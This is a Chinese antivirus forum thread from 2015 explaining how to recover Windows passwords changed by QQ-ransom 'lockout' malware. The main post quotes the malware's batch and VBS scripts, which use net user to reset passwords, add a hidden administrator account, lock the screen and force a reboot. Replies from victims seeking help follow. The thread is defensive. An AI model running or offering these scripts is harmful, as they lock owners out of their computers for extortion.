• :
  • 关于如何手动破解敲竹杠病毒(修改电脑开机密码要联系QQ的病毒)方法-爱毒霸交流论坛
    用户
     找回密码

        找回密码

    QQ登录

    只需一步,快速开始

    搜索

    [安全贴士] 关于如何手动破解敲竹杠病毒(修改电脑开机密码要联系QQ的病毒)方法

    [复制链接]

    该用户从未签到

    发表于 2015-5-11 09:50:17 只看该作者

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?

    x
    本帖最后由 星光@ 于 2015-5-11 09:56 编辑

            此类病毒目前只有两种形式,一种是基于脚本的文件,分为批处理和vbs脚本等,另一种是PE文件格式的exe程序,基于上术两种情况,现分别讲解破解方法
           脚本病毒破解:
    文件名字随意,文件格式是.bat和.vbs格式,其对应的文件图标分别是 QQ截图20150511092817.png QQ截图20150511092741.png (如果接收到此类文件最后不要直接双击运行,而要编辑方式打开查看内容),这两种文件密码是明文形式,只要右键编辑打开就能找到密码。CF蓝水晶转英雄级.bat文件打开其内容是:
    net user Administrator wsad1234+-    -----wsad1234+-即为Administrator帐号对应的密码
    net user admin zouzou1314520           -----zouzou1314520即为admin 和要密码加753767785$帐号对应密码
    net user 要密码加Q2697588286$ zouzou1314520 /add
    net localgroup administrators 要密码加753767785$ /add
    rundll32 user32,LockWorkStation

    下面对这几行脚本进行简单说明:
    net user Administrator wsad1234+- 更改用户名为Administrator 密码为wsad1234+-
    net user 要密码加Q2697588286$ zouzou1314520 /add  新建一个用户名为要密码加Q2697588286$密码为zouzou1314520的帐户,默认为user组成员。
    net localgroup administrators 要密码加753767785$ /add    把用户名要密码加753767785$添加到administrators 组(管理员组)

    对于vbs文件,其内容如下:
    password="2415123023"
    file=fol & "\net.exe"
    shut=fol & "\shutdown.exe"
    ws.run file & " user %UserName% "+Chr(34) & password & Chr(34),0,True
    ws.run shut & " /r /f /t 0",0
    其密码已经自己写出来了password="2415123023",对就是2415123023。
    综上,脚本病毒更改密码就是使用net user 用户名 密码  的命令

        针对exe格式的可执行文件,需要使用行为监控工具MD来进行破解,首先是安装此软件(下载地址http://dl.pconline.com.cn/download/52312.html),然后在设置里面改成“正常模式”,接着就运行病毒,进行一步一步监控,等到出现对应更改密码命令行,就可以看到密码了,如下qaz123,其更改密码命令还是使用net user 用户名 密码
    QQ截图20150511094551.png    
    MD设置
             QQ截图20150511094438.png
    监控密码更改
          最后给出pe系统下破解密码方法,参考http://bbs.cfanclub.net/thread-401366-1-1.html

    评分

    参与人数 1元宝 +1 收起 理由
    山水阿锐 + 1 本区有您更精彩!

    查看全部评分

    使用道具 举报 回复
    是啊
    使用道具 举报 回复
    发表于 2015-6-24 20:09:30 只看该作者
    我的是要密码加QQ1341118193求大神帮忙

    点评

    需要提供样本文件!  详情 回复 发表于 2015-10-8 17:57
    使用道具 举报 回复 支持 反对
    18253016462 发表于 2015-6-24 20:09
    我的是要密码加QQ1341118193求大神帮忙

    需要提供样本文件!
    使用道具 举报 回复 支持 反对
    我看看
    使用道具 举报 回复
    发表于 2016-6-10 21:12:25 只看该作者
    谁能帮我破解!谢谢
    使用道具 举报 回复 支持 反对
    ︷搁ɑ.浅▽ 发表于 2015-10-8 17:57
    需要提供样本文件!

    加我Q,我也中毒了啊   41047302

    点评

    已经加您QQ了。  详情 回复 发表于 2016-6-18 14:34
    使用道具 举报 回复 支持 反对

    能破解吗   加我Q帮我下   41047302
    使用道具 举报 回复 支持 反对
    461654132 发表于 2016-6-18 14:33
    加我Q,我也中毒了啊   41047302

    已经加您QQ了。
    使用道具 举报 回复 支持 反对
    使用道具 举报 回复 支持 反对
    我需要密码,求帮助(加Q2737624295)
    使用道具 举报 回复 支持 反对
    我打开了密码显示是5201314,但是登陆不了啊
    使用道具 举报 回复 支持 反对
    病毒样本:http://pan.baidu.com/s/1c10HBhu
    谢谢大神(qq505006239)
    使用道具 举报 回复 支持 反对
    使用道具 举报 回复 支持 反对
    我的电脑也中病毒了,也需要密码,求大神帮我,qq1243949167
    使用道具 举报 回复 支持 反对

    加下我好吗?609733759
    使用道具 举报 回复 支持 反对
    使用道具 举报 回复 支持 反对
    了解一下!
    使用道具 举报 回复
    加一下我的QQ我也中了敲竹杠188659835
    使用道具 举报 回复 支持 反对
    254060097我也中了有救吗
    使用道具 举报 回复 支持 反对
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则